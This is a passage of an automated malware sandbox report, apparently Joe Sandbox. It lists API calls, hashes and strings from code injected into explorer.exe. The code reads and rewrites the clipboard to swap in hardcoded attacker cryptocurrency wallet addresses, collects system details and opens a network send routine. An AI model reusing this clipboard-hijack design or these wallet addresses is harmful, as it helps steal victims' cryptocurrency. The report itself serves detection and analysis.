                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF270DF
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF270F3
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27107
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27118
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2712C
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2714A
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: wsprintfA.USER32 ref: 0DF27162
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27176
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2718A
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF271C6
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: WSAStartup.WS2_32 ref: 0DF271D6
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: socket.WS2_32 ref: 0DF271F2
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: gethostbyname.WS2_32 ref: 0DF27209
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: memcpy.MSVCRT ref: 0DF27229
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: htons.WS2_32 ref: 0DF27238
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: connect.WS2_32 ref: 0DF2724F
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrlenA.KERNEL32 ref: 0DF27265
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: send.WS2_32 ref: 0DF2727B
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 0DF351A1
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32 ref: 0DF351BF
                                                                                                                                                                                                                                  • GetTempFileNameA.KERNEL32 ref: 0DF351D5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF351E5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF351F1
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0DF3521A
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 0DF3523F
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0DF3524E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0DF35257
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32 ref: 0DF35285
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0DF35294
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0DF3529F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3619236930-0
                                                                                                                                                                                                                                  • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction ID: 9709cce6d7a75b0dde14bd2921ddb91f7038e531036f6933d98b0810fe2c1af7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17519E32714A428AEB10DFA6E8543AE77B0F788B88F558026DE8E47F58DF78C144CB10
                                                                                                                                                                                                                                  Function 0DF353E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 0DF35499
                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 0DF354B3
                                                                                                                                                                                                                                    • Part of subcall function 0DF2F310: WideCharToMultiByte.KERNEL32 ref: 0DF2F353
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0DF354DC
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0DF354ED
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0DF3553D
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: EnterCriticalSection.KERNEL32 ref: 0DF29248
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: RtlInitializeCriticalSection.NTDLL ref: 0DF29255
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcpyA.KERNEL32 ref: 0DF2928A
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcpyA.KERNEL32 ref: 0DF292AD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcatA.KERNEL32 ref: 0DF292BD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcatA.KERNEL32 ref: 0DF292CD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: LeaveCriticalSection.KERNEL32 ref: 0DF29354
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: memcpy.MSVCRT ref: 0DF2936C
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrlenA.KERNEL32 ref: 0DF2937A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0DF35551
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                  • String ID: 2.5
                                                                                                                                                                                                                                  • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                                  • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction ID: 257b5ce6d8374516f8fc9f6194df5bf491d59b50bf2f9493c05d3c578034fb83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28417132624A818AD720DF71E8443EEB7B5FB88788F858116EB4E47A5CDF78C645CB10
                                                                                                                                                                                                                                  Function 0DF28660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3234909527-0
                                                                                                                                                                                                                                  • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction ID: b141c24b4193dd37a8a231b2176ce7101505f3a3c998baeb2f91e440df350775
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58314C32604A4187EB24CF69E45033AB7A2FB89BD8F48C226DA5E47798DF3CC545CB51
                                                                                                                                                                                                                                  Function 0E0EB2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                  • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                  • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction ID: ca4f5d689c051d063a835eb9623042f7e8e62a9ac6591b890a0888e4ff46360d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66419F7131468685EB64EF75E8543EA2390BF88780F840876D94A57B24DF7CC588CB50
                                                                                                                                                                                                                                  Function 0DF3B2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                  • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                  • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction ID: aa3fcfcab4389b246c7d375778d1271816aaf5a9d5362a1aafae8a9a82dd9bc3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF415120218A4691EB14EFBDFCA47BA3355FF88784F46C03A9A4F46664DF78C588C761
                                                                                                                                                                                                                                  Function 1020B2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                  • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                  • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction ID: 051b2104983a85846aa865f72799edf5a42382c0365a44a67aaf4ea5dc3bb2a6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D41D37431474682EB54EF35FCA97DA2361FFA8784F805026E98E46628DFBCC189C750
                                                                                                                                                                                                                                  Function 102073B0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 637 102073b0-102073da call 10207a00 640 102073e0-10207416 call 10207960 call 101f2c10 call 102072a0 call 10207a90 637->640 649 10207418-10207476 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 640->649 650 1020747b-102074a8 call 101f2c10 call 102072a0 call 10207a90 640->650 649->650 663 102074aa-10207508 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 650->663 664 1020750d-1020753a call 101f2c10 call 102072a0 call 10207a90 650->664 663->664 684 1020753c-1020759a call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 664->684 685 1020759f-102075cc call 101f2c10 call 102072a0 call 10207a90 664->685 684->685 705 10207631-1020765e call 101f2c10 call 102072a0 call 10207a90 685->705 706 102075ce-1020762c call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 685->706 726 10207660-102076be call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 705->726 727 102076c3-102076f0 call 101f2c10 call 102072a0 call 10207a90 705->727 706->705 726->727 747 102076f2-10207750 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 727->747 748 10207755-10207782 call 101f2c10 call 102072a0 call 10207a90 727->748 747->748 768 10207784-102077e2 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 748->768 769 102077e7-10207814 call 101f2c10 call 102072a0 call 10207a90 748->769 768->769 789 10207816-10207874 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 769->789 790 10207879-102078a6 call 101f2c10 call 102072a0 call 10207a90 769->790 789->790 810 102078a8-10207906 call 101f1100 call 101f2c10 call 102072a0 call 10207b00 call 101f2c10 call 10207b50 call 101f1200 790->810 811 1020790b-1020791a Sleep call 101f1200 790->811 810->811 816 1020791f 811->816 816->640
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 10207960: OpenClipboard.USER32 ref: 10207971
                                                                                                                                                                                                                                    • Part of subcall function 10207960: GetClipboardData.USER32 ref: 10207983
                                                                                                                                                                                                                                    • Part of subcall function 10207960: GlobalLock.KERNEL32 ref: 10207994
                                                                                                                                                                                                                                    • Part of subcall function 10207960: GlobalUnlock.KERNEL32 ref: 102079A5
                                                                                                                                                                                                                                    • Part of subcall function 10207960: CloseClipboard.USER32 ref: 102079AB
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: GlobalAlloc.KERNEL32 ref: 10207B78
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: GlobalLock.KERNEL32 ref: 10207B8F
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: GlobalUnlock.KERNEL32 ref: 10207BA7
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: OpenClipboard.USER32 ref: 10207BAF
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: EmptyClipboard.USER32 ref: 10207BB5
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: SetClipboardData.USER32 ref: 10207BC3
                                                                                                                                                                                                                                    • Part of subcall function 10207B50: CloseClipboard.USER32 ref: 10207BC9
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 10207910
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Pz], xrefs: 1020763E, 10207680
                                                                                                                                                                                                                                  • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 1020753C
                                                                                                                                                                                                                                  • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 102075CE
                                                                                                                                                                                                                                  • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 10207660
                                                                                                                                                                                                                                  • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 10207784
                                                                                                                                                                                                                                  • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 10207816
                                                                                                                                                                                                                                  • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 102076F2
                                                                                                                                                                                                                                  • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 102078A8
                                                                                                                                                                                                                                  • Pj], xrefs: 102075AC, 102075EE
                                                                                                                                                                                                                                  • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 102074AA
                                                                                                                                                                                                                                  • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 10207418
                                                                                                                                                                                                                                  • Pu], xrefs: 10207488, 102074CA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                  • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$Pj]$Pu]$Pz]$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                  • API String ID: 2992153386-3220127492
                                                                                                                                                                                                                                  • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction ID: 68cebd4f2478781b0c7040840a2d5cb15f117a55b554b3bc112761f041e38faa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74D10A79B11A46A9EF00DFA1E4A52DC2326F7657CCBC14012AE0E9BA5CEF78D25DC350
                                                                                                                                                                                                                                  Function 0E0E73B0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1031 e0e73b0-e0e73da call e0e7a00 1034 e0e73e0-e0e7416 call e0e7960 call e0d2c10 call e0e72a0 call e0e7a90 1031->1034 1043 e0e747b-e0e74a8 call e0d2c10 call e0e72a0 call e0e7a90 1034->1043 1044 e0e7418-e0e7476 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1034->1044 1058 e0e750d-e0e753a call e0d2c10 call e0e72a0 call e0e7a90 1043->1058 1059 e0e74aa-e0e7508 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1043->1059 1044->1043 1078 e0e759f-e0e75cc call e0d2c10 call e0e72a0 call e0e7a90 1058->1078 1079 e0e753c-e0e759a call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1058->1079 1059->1058 1099 e0e75ce-e0e762c call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1078->1099 1100 e0e7631-e0e765e call e0d2c10 call e0e72a0 call e0e7a90 1078->1100 1079->1078 1099->1100 1121 e0e76c3-e0e76f0 call e0d2c10 call e0e72a0 call e0e7a90 1100->1121 1122 e0e7660-e0e76be call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1100->1122 1141 e0e7755-e0e7782 call e0d2c10 call e0e72a0 call e0e7a90 1121->1141 1142 e0e76f2-e0e7750 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1121->1142 1122->1121 1162 e0e77e7-e0e7814 call e0d2c10 call e0e72a0 call e0e7a90 1141->1162 1163 e0e7784-e0e77e2 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1141->1163 1142->1141 1183 e0e7879-e0e78a6 call e0d2c10 call e0e72a0 call e0e7a90 1162->1183 1184 e0e7816-e0e7874 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1162->1184 1163->1162 1204 e0e790b-e0e791a Sleep call e0d1200 1183->1204 1205 e0e78a8-e0e7906 call e0d1100 call e0d2c10 call e0e72a0 call e0e7b00 call e0d2c10 call e0e7b50 call e0d1200 1183->1205 1184->1183 1210 e0e791f 1204->1210 1205->1204 1210->1034
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7960: OpenClipboard.USER32 ref: 0E0E7971
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7960: GetClipboardData.USER32 ref: 0E0E7983
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7960: GlobalLock.KERNEL32 ref: 0E0E7994
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7960: GlobalUnlock.KERNEL32 ref: 0E0E79A5
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7960: CloseClipboard.USER32 ref: 0E0E79AB
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: GlobalAlloc.KERNEL32 ref: 0E0E7B78
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: GlobalLock.KERNEL32 ref: 0E0E7B8F
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: GlobalUnlock.KERNEL32 ref: 0E0E7BA7
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: OpenClipboard.USER32 ref: 0E0E7BAF
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: EmptyClipboard.USER32 ref: 0E0E7BB5
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: SetClipboardData.USER32 ref: 0E0E7BC3
                                                                                                                                                                                                                                    • Part of subcall function 0E0E7B50: CloseClipboard.USER32 ref: 0E0E7BC9
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0E0E7910
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • PI], xrefs: 0E0E73F6, 0E0E7438
                                                                                                                                                                                                                                  • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0E0E75CE
                                                                                                                                                                                                                                  • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0E0E78A8
                                                                                                                                                                                                                                  • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0E0E753C
                                                                                                                                                                                                                                  • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0E0E7660
                                                                                                                                                                                                                                  • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0E0E7784
                                                                                                                                                                                                                                  • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0E0E7418
                                                                                                                                                                                                                                  • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0E0E7816
                                                                                                                                                                                                                                  • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0E0E74AA
                                                                                                                                                                                                                                  • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0E0E76F2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                  • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$PI]$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                  • API String ID: 2992153386-723198107
